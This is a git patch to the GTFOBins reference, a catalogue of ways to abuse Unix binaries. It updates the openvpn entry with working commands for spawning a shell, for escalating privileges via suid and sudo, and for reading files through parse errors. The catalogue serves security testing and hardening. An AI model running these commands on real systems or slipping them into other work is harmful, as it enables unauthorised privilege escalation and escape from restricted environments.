From c299dc3a525e33891bf79d65518c3bd1146abd2d Mon Sep 17 00:00:00 2001 From: Andrea Cardaci Date: Sat, 20 Feb 2021 00:55:31 +0100 Subject: [PATCH] Allow unprivileged shell in openvpn by using a null device Related #171. --- _gtfobins/openvpn.md | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/_gtfobins/openvpn.md b/_gtfobins/openvpn.md index aa02ad2..9f959e3 100644 --- a/_gtfobins/openvpn.md +++ b/_gtfobins/openvpn.md @@ -1,5 +1,8 @@ --- functions: + shell: + - code: | + openvpn --dev null --script-security 2 --up '/bin/sh -c sh' file-read: - description: The file is actually parsed and the first partial wrong line is returned in an error message. code: | @@ -7,14 +10,14 @@ functions: openvpn --config "$LFILE" suid: - code: | - ./openvpn --dev tun0 --script-security 2 --up '/bin/sh -p -c "sh -p"' + ./openvpn --dev null --script-security 2 --up '/bin/sh -p -c "sh -p"' - description: The file is actually parsed and the first partial wrong line is returned in an error message. code: | LFILE=file_to_read ./openvpn --config "$LFILE" sudo: - code: | - sudo openvpn --dev tun0 --script-security 2 --up '/bin/sh -c sh' + sudo openvpn --dev null --script-security 2 --up '/bin/sh -c sh' - description: The file is actually parsed and the first partial wrong line is returned in an error message. code: | LFILE=file_to_read